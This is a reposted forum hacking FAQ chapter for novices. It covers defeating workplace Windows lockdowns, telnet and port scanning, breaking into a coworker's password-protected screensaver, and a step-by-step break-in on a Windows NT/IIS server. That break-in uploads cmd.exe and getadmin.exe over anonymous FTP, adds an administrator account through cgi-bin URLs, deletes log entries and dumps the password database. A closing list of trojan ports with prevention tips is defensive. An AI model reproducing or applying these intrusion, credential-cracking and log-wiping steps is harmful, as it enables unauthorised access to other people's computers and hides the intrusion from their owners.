Chapter 3 of Newbie Questions answered - Same as the last two chapters, I didn't write 'em.
____________________________________________________
Past two chapters -

Chapter 1 -
http://www.antionline.com/showthread...hreadid=134048

Chapter 2 -
http://www.antionline.com/showthread...hreadid=134563
____________________________________________________

Topics covered in Chapter 3 -

At my workplace, loads of things in Windows are disabled, how can I access them?
Can you explain this telnet / ports thing in a bit more detail?
How can I get round a passworded screen saver?
What are some good techniques of breaking into Windows NT from the Internet?
What open ports should I look out for on my own computer? (Trojan Detection)

--------------------------------------------------------------------------------

At my workplace, loads of things in Windows are disabled, how can I access them?

Right, well I have been faced with this as well! I think my workplace was using a program called 'WinLock 95' which would disable a number of things...including:

"My Computer"
The control panel - and any of the other ways of getting to programs in it
Items on the start menu
Network items
Most people found this annoying. It meant that you couldn't change your wallpaper/screensaver/default printer etc. You are stuck with what they give you! Well, wouldn't it be great to get round this? Well, yeah!

Go to the start menu, there should still be the option of 'Help' (I don't think this would be disabled) open it and go to 'Index'. Right, now you can access help of various items of windows. So, lets think of something that they have disabled...hmmm, how about add/remove programs! In the help index type "add/". The help topic 'add/remove programs' should be highlighted - select it. Then choose 'Removing a program from your computer'. The help topic is displayed - see the little clickable object that says "Click here to open the Add/Remove Programs dialog box." CLICK IT! BINGO! You're in the add/remove programs!

Now, if you wanted full control back, you could try looking through the program list for the protection program (e.g. WinLock) and removing it!

Try this technique with all the disabled items, such as display properties, modem properties, printers, keyboard settings etc.


--------------------------------------------------------------------------------

Can you explain this telneting thing in a bit more detail?

Well, ok. Here's what we established in Volume 1:

Telnet is a program that allows you to connect to other computers using ports. Every computer/server has ports, the most common ones you would see when using telnet are:

Port 21: FTP

Port 23: Telnet

Port 25: SMTP (Mail)

Port 37: Time

Port 43: Whois

Port 79: Finger

So, for example you could tell Telnet to connect to mail.virgin.net on port 25. This would connect you to Virgins mail server.

Well, that's the basic principle anyway. How do we get into Telnet? Here's how:

Windows 9x - Telnet.exe will be installed if you Dial Up Networking (DUN) installed. It should be in the c:\windows\ directory by default. If you can't find it try using the Start Menu - Find to get hold of it.
Windows 3.x - Look for a program called 'Terminal.exe' which is the equivalent (I believe). I am not a user of Win 3.x so you will have to find that yourself (or you could upgrade Windows hint, hint!).
Windows NT - I am pretty sure that Telnet does not come with Windows NT. You may have to go on the net and find an alternative. Try http://www.winfiles.com
Unix/Linux systems - type Telnet at the prompt (syntax: Telnet <Hostname> <Port>)
Telnet is a simple program with few options. It's a good program to use, and I still use it, although I have found a good alternative at http://www.vector.co.jp/authors/VA002416/teraterm.html called "Tera Term Pro". You can find Telnet alternatives all over the net, try http://www.winfiles.com for a replacement.

Ok, we will assume you are using Telnet. It is pretty straight foward to connect to something, so I leave that for you to work out! Obviously to connect you will need two things, the hostname (or IP address), and the port on which to connect to. Ports are like doors on a computer which information can either enter into, or leave. The ports we are referring to are not like printer ports or keyboard ports (although the fundamental idea of information going in and out of a port is the same) on your computer at home, these are more - well, internet ports - invisible ports if you like. When you connect to a port you will usually get some kind of response on your screen. This is because there is a program running on each port to let you communicate with the host. These programs are called 'Services'. Here is a larger listing of the ports you probably will encounter:

# Name

7 echo

9 discard

11 systat

13 daytime

15 netstat

17 qotd

19 chargen

20 ftp-data

21 ftp

23 telnet

25 smtp

37 time

42 name

43 whois

53 domain

57 mtp

77 rje

79 finger

80 HTTP

87 link

95 supdup

101 hostnames

102 iso-tsap

103 dictionary

104 x400-snd

105 csnet-ns

109 pop

110 pop3

111 portmap

113 auth

115 sftp

117 path

119 nntp

139 nbsession

144 NeWS

158 repo

170 print-srv

175 vmnet

400 vmnet0

512 exec

513 login

514 shell

515 printer

520 efs

526 tempo

530 courier

531 conference

532 netnews

540 uucp

543 klogin

544 kshell

556 remotefs

600 garcon

601 maitrd

602 busboy

750 kerberos

751 kerberos_master

754 krb_prop

888 erlogin

You will grow to recognise which ports you are most likely to see open on a server, but hey! How do you find out what ports are open? You need a port scanner! There are literally hundreds of scanners around, try downloading the WangScript Wartools from http://come.to/wangscript - it contains a good port scanner. A port scanner will basically scan a hostname or IP address on the port range you specify. It will then return only the ports that are open for connections.

Anyway, back to what I was saying - you will learn to guess what ports are likely to be open. For example, if I port scan mail.btinternet.com I can instantly tell you that the most likely ports to be open are 25 and 110 (The mail ports, SMTP and POP3). Lets look at a couple of example situations that you should look out for. If I scanned the IP address, 192.169.22.127 and found:

[7]

[9]

[11]

[13]

[21]

[23]

[25]

[79]

[80]

[110]

[113]

[143]

These are all the open ports on that IP address. Now, I will say that most IP addresses you scan will not reveal anywhere near this amount, but if you get an IP address of someone running Unix or Linux then you might get a few ports open. This result is interesting. From this we can see that a lot of very important ports have been left open - this makes me think of a few possibilities. This could be some kind of large server which needs a lot of ports open for various things (It should therefore be pretty secure). However, it could also be some complete retard! Someone who has installed unix and doesn't know what to do to secure his comp. It could also however, be some kind of trap! Someone might be waiting for you to hack this computer so they can bust you.

So, how do we find out? Well, we cautiously connect to a few ports just to see what we are greeted with. It may even tell us what the computer is or who it is owned by. Lets look at another example scan:

[22]

[23]

[25]

[37]

[70]

[109]

[110]

[143]

This is different. Although there are a lot of open ports, some of the more important ports are closed. Notice there is no Echo(7), DayTime(13), NetStat(15), FTP(21) or Finger(79) ports open. This suggests this is run by someone who is very cautious of people prying - a system administrator perhaps? Remember you can also scan Hostnames, you do not have to use the IP address - so you could port scan mail.btinternet.com or www.microsoft.com.

Have a play and see what you can find!


--------------------------------------------------------------------------------

How can I get round a passworded screen saver?

Ok, why would you want to do this? Well, say someone you work with always leaves their computer on, but with a passworded screensaver running - how would we break through it and get access? Another situation might be a computer shop (although these tend to take further precautions which I can't go through here) which uses passworded screensavers to stop the customers tampering.

To get round this, try these techniques:

1> Always try the key combination ctrl + alt + delete to try to bring up the 'close programs' dialog box. This hardly ever works, but sometimes it does. If it works and you see the box, look through the list of running programs and close down the screensaver.

2> Try turning off the computer, then switching it back on. I know this sounds weird, but you probably have a better chance of cracking through the boot up/windows log on passwords. Try the break in techniques mentioned in FAQ volume 2.

3> Wait until you see him go away from his computer for just a little while, assuming the screensaver isn't yet running - use a screen saver cracker program to give you the password (I made one called ScrCrack which cracks windows 3.x and 9x screensaver passwords - its on the website at http://welcome.to/wangsdomain ). You can then break in with the password without him knowing when he goes to lunch or something. Its always more fun to know the password! (perhaps its his password for other things as well? Such as the network password?).

4> When he leaves, boot the computer into DOS (using one of the break in techniques in Volume 2) and then copy the file c:\windows\user.dat to a floppy disk (or if Windows profiles are being used, copy c:\windows\profiles\(his username)\user.dat). Then put this file on your computer and tell your screensaver cracker to crack it (It is able to crack the user.dat file taken from another computer as well!).

5> This is the almost-bound-to-work method. You need to get hold of a Screensaver cracking CD. Here's what happens: The screensaver is running - you put the CD in the drive and AS LONG AS the CD autoplay facility on the CDROM is on - it will run a program which decrypts the screen saver password, closes the screen saver, and then tells you what the password was. I made one of these CD's recently, and they work like magic (as long as Autoplay CD is on). It is now available to buy from the site, yes - buy! basically because I have spent a long time ensuring it works efficiently, and does the job well. Buy from here


--------------------------------------------------------------------------------

What are some good techniques of breaking into a Windows NT machine from the Internet?

First of all, if you are planning to hack Windows NT, then you should really have a computer at home loaded with it so you can plan how to do it. Anyway, I have never had the need to break into Windows NT, but I have read some things about it, so here's what I know about it. This first method demonstrates how to break in via the Internet:

Find a server running IIS

Open a DOS window and type ' FTP <the company name>'. So you might type:

c:\Ftp www.dodgyinc.com

You may not get a connection, it depends whether the server is running an FTP service. Keep trying and find one that does. Once you connect, you will get something like this:

Connected to www.dodgyinc.com.

220 Vdodgy Microsoft FTP Service (Version 3.0).

User (www.dodgyinc.com:(none)):

This little piece of information is important, it tells us the NetBios name of the computer - Vdodgy. From this you can deduce the name of the anonymous internet account that is used by NT to allow people to anonymously use the WWW, FTP and Gopher services on the machine. If the default account hasn't been changed, the anonymous internet account will be called IUSR_VDODGY. This information will be needed later if your going to gain Administrator access to the machine. Enter "anonymous" as the user and the following appears :

331 Anonymous access allowed, send identity (e-mail name) as password.

Password:

Now, the password could be anything. However, try just hitting enter and see if you get in, then try typing the password as 'anonymous'. If all fails, log in to the FTP service again - not using anonymous, but using 'Guest'. Then try hitting enter or using 'guest' for the password.

Now type 'cd /c' and then see if you can actually put any files on to the server (i.e. check whether write permission is enabled on this FTP server). It works? ok, now look for a directory called 'cgi-bin'. If there is one, then your in luck. Usually a system admin might have one so that he can remotely make changes to the system. The cgi-bin directory can contain programs which you can run from your web browser. Hacking ahoy!

Change to the cgi-bin directory and change the type to 'I' using the 'Binary' command. Then type 'put cmd.exe'. Next you will need to hacking files from the internet. I can not give you any download addresses, but look on the net for 'getadmin.exe' and 'gasys.dll'. Once you have them, put them into the cgi-bin directory as well. Now close the command prompt window.

Now, use your browser to go to: http://www.dodgyinc.com/cgi-bin/geta...xe?IUSR_VDODGY

After a few seconds this will appear:

CGI Error

The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:

Congratulations , now account IUSR_VDODGY have administrator rights!

You just made the anonymous user account equal to administrator! Now you want to create your own account on the system (with supervisor rights obviously!). Type in:

http://www.dodgyinc.com/cgi-bin/cmd....iammole%20/add

That will create an account login of 'Mole' with the password 'iammole'. Now we need to make it administrator privaleges:

http://www.dodgyinc.com/cgi-bin/getadmin.exe?mole

Now disconnect and go to the start menu -> find and search for the computer 'www.dodgyinc.com'.

When it is found, right click on the "computer" and then clicks on Explore. NT Explorer opens (I told you to use NT for this!) and after a little wait you are prompted for a user-name and password. Enter "mole" and "iammole".

Admin rights for the computer www.dodgyinc.com are appended to your own security access token...now he can do anything. Using NT Explorer, map a drive to the hidden system share C$. Changes to the 'Winnt\system32\logfiles' directory and open up the logfile for that day. Now delete all of the log entries which point in any way to you, then save it. If you get a message about sharing violations, change the date on the computer with the following URL:

http://www.dodgyinc.com/cgi-bin/cmd....ate%2002/02/98

Now use the registry editor to connect to the computer. Now you need to have a program called 'l0pht crack' available from:

http://www.l0pht.com

Use the program to dump the SAM (security accounts manager) on the server and then start cracking the passwords. Now to cover your tracks once more, delete 'cmd.exe', 'getadmin.exe', and 'gasys.dll' from 'cgi-bin'. Now check the security event log for the remote NT server using Event Viewer to see if there are any traces there. Finally using User Manager for Domains, remove admin rights from the IUSR_VDODGY account and delete the 'Mole' account. You don't need this account anymore....L0phtcrack will be able to brute force all the accounts. Next time you connect to this machine it will be using the Administrator account because you will have cracked the password!

This is just one vulnerability that was discovered a while back, for up to date findings refer to websites such as:

http://www.rootshell.com

http://www.antionline.com


--------------------------------------------------------------------------------

What open ports should I look out for on my own computer? (Trojan Detection)

If you have port scanned yourself and found some suspicous open ports - your bound to be worried! Really, on your comp you should know exactly what ports to expect to see open. As we have said before, a trojan is an independent program that appears to perform a useful function but that hides another unauthorized program inside it. When an authorized user performs the apparrent function, the trojan horse performs the unauthorized function as well (often usurping the priveleges of the user). This is not always the case. Some of the trojans being distributed today (eg. Netbus) are made up of two programs - a client and a server. The server program is the program which will infect the victims computer. For example the netbus trojan server program used to be called 'Patch.exe'. When someone ran it, nothing seemed to happen so they forgot about it - but in fact it made the persons computer opened up and listen on port 12345 for any connections. Then someone else could use the client program as a kind of control panel to control the other person PC.

Here are some of the most common trojans and what ports they infect: -

PORT TROJAN

21 Blade Runner

21 WinCrash

31 Hackers Paradise

456 Hackers Paradise

666 Back Oriface

1080 Netbus Pro

1243 SubSeven

3024 WinCrash

6670 Deep Throat

6671 Deep Throat

12345 NetBus

21544 Girl Friend

26274 Delta Trojan

31337 Back Orifice

47264 Delta Trojan

Now, these are just the default ports that these trojans infect...SOME of the trojans allow you to specify which port to open on the persons computer - so be warned. Also, some of the open ports on your computer may be legitamate - for example, just because your port 21 is open it doesn't mean you have the WinCrash trojan - you might be running an FTP server?

If you are infected with any of them, try doing a search in http://www.altavista.com or http://www.metacrawler.com for a fix. (uraloony's own addition - http://www.google.com/)

To stop avoid getting infected with any of these, make sure you follow these guide lines: -

Don't accept files over IRC...especially .exe files, .com files, or .dll's
Get a virus scanner and regularly download updated virus definition files from the net
Virus scan all downloads you make from the net
Don't run any files sent to you over email or ICQ
Make sure no-one but you has physical access to your computer - use passwords!
Live in a cardboard box and destroy your computer and modem